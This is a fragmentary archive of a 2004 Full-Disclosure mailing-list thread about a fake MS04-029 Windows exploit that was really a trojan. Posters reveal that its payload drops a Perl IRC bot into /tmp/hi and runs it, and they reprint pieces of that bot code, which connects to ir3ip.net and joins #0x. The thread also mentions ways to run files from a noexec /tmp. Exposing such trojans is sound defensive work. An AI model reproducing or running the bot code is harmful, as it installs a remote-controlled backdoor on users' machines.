Anyone compiled and tested this yet ?
Cor blimy! I really hope you are joking.
Have you ever used perl before?
It's an interpreted language!
And this code looks like it connects to an irc server(ir3ip.net) joins
a channel(#0x) then messages the user k.
Might have messed that slightly only
It was much more easier to do:
$ gcc exploit.c
$ strings a.out
/lib/ld-linux.so.2
libc.so.6
memcpy
perror
chmod
fprintf
fseek
strncpy
sscanf
memset
fclose
exit
fopen
atoi
_IO_stdin_used
__libc_start_main
__gmon_start__
GLIBC_2.1
GLIBC_2.0
PTRh
#!/usr/bin/perl
It´s a simple perl script...
and i don´t think you can call it an remote exploit?
greets
Ferdinand aka. Bart
Am 04.11.2004 um 11:40 schrieb DanB UK:
Anyone compiled and tested this yet ?
Cor blimy! I really hope you are joking.
Have you ever used perl before?
It's an interpreted language!
And this
Yes thats right
Am 04.11.2004 um 15:31 schrieb Vincent Archer:
to
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
DanB UK wrote:
Anyone compiled and tested this yet ?
Cor blimy! I really hope you are joking.
Have you ever used perl before?
It's an interpreted language!
And this code looks like it connects to an irc server(ir3ip.net) joins
a channel(#0x) then messages the user k.
Might have messed that
On Thu, Nov 04, 2004 at 02:32:33PM +0100, Ferdinand Klinzer wrote:
It´s a simple perl script...
and i don´t think you can call it an remote exploit?
It's more subtle than you think.
The exploit is supposed to try to open a cmd tool on 31337 (eleet) on
a target Windows. It fails; the window
The exploit is supposed to try to open a cmd tool on 31337 (eleet) on
a target Windows. It fails; the window system is secure... but meanwhile,
there's a perl IRC bot running in the background of *your* system.
From what I saw of the code yesterday a connection to the windows box
was not even
] New REmote Windows Exploit (MS04-029)
On Thu, Nov 04, 2004 at 02:32:33PM +0100, Ferdinand Klinzer wrote:
It´s a simple perl script...
and i don´t think you can call it an remote exploit?
It's more subtle than you think.
The exploit is supposed to try to open a cmd tool on 31337 (eleet
Ok so I was dumb enough to run it. Anyone else catch what commands they
run/ know of a way to track. I really don't feel like re-compiling gentoo.
-mike
Vincent Archer wrote:
On Thu, Nov 04, 2004 at 02:32:33PM +0100, Ferdinand Klinzer wrote:
It´s a simple perl script...
and i don´t think
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
Does anyone still have /tmp without noexec ?
/dev/sda2 on /tmp type ext3 (rw,noexec,nodev,nosuid)
On Wed, Nov 03, 2004 at 10:58:54PM -0500, Brendan Dolan-Gavitt wrote:
Here's a rather tidier version of the perl it drops in /tmp/hi,
courtesy of
It seems that it was first posted here:
http://neworder.box.sk/forum.php?did=multSecurity%20and%20Networkingthread=206439
De: raza [EMAIL PROTECTED]
A: 'Vincent Archer' [EMAIL PROTECTED], 'Ferdinand Klinzer' [EMAIL PROTECTED]
Objet: RE: [Full-Disclosure] New REmote Windows Exploit
PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of Vincent
Archer
Sent: 04 November 2004 14:31
To: Ferdinand Klinzer
Cc: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] New REmote Windows Exploit (MS04-029)
On Thu, Nov 04, 2004 at 02:32:33PM +0100, Ferdinand Klinzer wrote:
It´s a simple perl script
On Thu, 04 Nov 2004 11:07:47 EST, Michael Riedel said:
Ok so I was dumb enough to run it. Anyone else catch what commands they
run/ know of a way to track. I really don't feel like re-compiling gentoo.
Multiple people have posted what Perl code gets executed.
The problem is this:
$_ =
On Thu, 04 Nov 2004 15:33:38 -0200, Rodrigo Barbosa said:
Does anyone still have /tmp without noexec ?
/dev/sda2 on /tmp type ext3 (rw,noexec,nodev,nosuid)
1) A lot of people have a one partition for everything configuration,
as that's what their distro did at the time they first installed
that it was first posted here:
http://neworder.box.sk/forum.php?did=multSecurity%20and%20Networkingthread=206439
De: raza [EMAIL PROTECTED]
A: 'Vincent Archer' [EMAIL PROTECTED], 'Ferdinand Klinzer' [EMAIL
PROTECTED]
Objet: RE: [Full-Disclosure] New REmote Windows Exploit
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1
On Thu, Nov 04, 2004 at 02:24:53PM -0500, [EMAIL PROTECTED] wrote:
2) An amazing amount of stuff assumes that /tmp has 'exec' - at
least for a while, 'rpmbuild' of a Redhat Perl would die because it
build into a directory on /tmp, and then tried to
On Thu, Nov 04, 2004 at 03:33:38PM -0200, Rodrigo Barbosa wrote:
Does anyone still have /tmp without noexec ?
/dev/sda2 on /tmp type ext3 (rw,noexec,nodev,nosuid)
$ /lib/ld-linux.so.2 /tmp/anexe
(or in this case)
$ perl /tmp/hi
Those are just two off the top of my head; I've read of enough
On Thu, 04 Nov 2004 18:09:48 -0200, Rodrigo Barbosa said:
I'm not sure which standard (FHS ? LSB ?), but these softwares should
honor the TMPDIR environment. And yes, /tmp is the fallback, in case
$TMPDIR is not set.
OpenOffice apparently does now, after I filed a bug about it. I've not
On Thu, 04 Nov 2004 14:27:30 CST, Brent J. Nordquist said:
$ /lib/ld-linux.so.2 /tmp/anexe
This one is actually nailed down in the Linux 2.6 kernel.
pgpsAyFwSJwyc.pgp
Description: PGP signature
The moderator/admin messed things up - I did not send this!
Heikki Toivonen wrote:
/*
* Date: 2004/10/30
* Maxload [EMAIL PROTECTED]
*
* Exploit for \Vulnerability in RPC Runtime Library\
* http://www.microsoft.com/technet/security/bulletin/MS04-029.mspx
*
* Tested Against:
* Windows
python /tmp/p.py
Cute.
#!/usr/bin/perl
$chan=#0x;$nick=k;$server=ir3ip.net;$SIG{TERM}={};exit if fork;use
IO::Socket;$sock = IO::Socket::INET-new($server.:6667)||exit;print
$sock USER k +i k :kv1\nNICK k\n;$i=1;while($sock=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
Something/somebody is messing things up - I did not send this!
/*
* Date: 2004/10/30
* Maxload [EMAIL PROTECTED]
*
* Exploit for \Vulnerability in RPC Runtime Library\
* http://www.microsoft.com/technet/security/bulletin/MS04-029.mspx
*
* Tested Against:
* Windows 2000 (SP3 SP4)
*
Ahem, nice try.
http://neworder.box.sk/forum.php?did=multSecurity%20and%
20Networkingthread=206439
On Wednesday 03 November 2004 02:14 pm, Heikki Toivonen wrote:
/*
* Date: 2004/10/30
* Maxload [EMAIL PROTECTED]
*
* Exploit for \Vulnerability in RPC Runtime Library\
*
its a trojan...
[EMAIL PROTECTED]:~ strings /tmp/hi
#!/usr/bin/perl
$chan=#0x;$nick=k;$server=ir3ip.net;$SIG{TERM}={};exit if fork;use
IO::Socket;$sock = IO::Socket::INET-new($server.:6667)||exit;print
$sock USER k +i k :kv1\nNICK k\n;$i=1;while($sock=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
Excellent exploit, I'm sure no one will spot that perl IRC bot in there,
nope no one will see that...
(hint for the readers, try looking at the ascii out put of the char
*shellcode_payload= data, looks a little like the following)
[code]
#!/usr/bin/perl
$c
han=#0x;$nick=k
;$server=ir3ip.n
Interesting /tmp/hi file.
#!/usr/bin/perl
$chan=#0x;$nick=k;$server=ir3ip.net;$SIG{TERM}={};exit
if fork;use IO::Socket;$sock =
IO::Socket::INET-new($server.:6667)||exit;print
$sock USER k +i k :kv1\nNICK
k\n;$i=1;while($sock=~/^[^ ]+ ([^ ]+)
/){$mode=$1;last if
Do i need too say more :D
You sure do, like for example, explain the following in your code and
why it makes /tmp/hi (/var/tmp/hi) and then executes it and it contains
this code
#!/usr/bin/perl
$chan=#0x;$nick=k;$server=ir3ip.net;$SIG{TERM}={};exit if fork;use
IO::Soc
ket;$sock =
Anyone compiled and tested this yet ?
Thanks
Raz
___
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Yep, Dave pointed that out really fast...
-Original Message-
From: [EMAIL PROTECTED]
[mailto:[EMAIL PROTECTED] On Behalf Of
Barrie Dempster
Sent: Wednesday, November 03, 2004 3:19 PM
To: [EMAIL PROTECTED]
Subject: Re: [Full-Disclosure] New Remote Windows Exploit (MS04-029
Here's a rather tidier version of the perl it drops in /tmp/hi,
courtesy of PerlTidy.
#!/usr/bin/perl
$chan = #0x;
$nick = k;
$server= ir3ip.net;
$SIG{TERM} = {};
exit if fork;
use IO::Socket;
$sock = IO::Socket::INET-new( $server . :6667 ) || exit;
print $sock USER k +i k :kv1\nNICK
30 matches
Mail list logo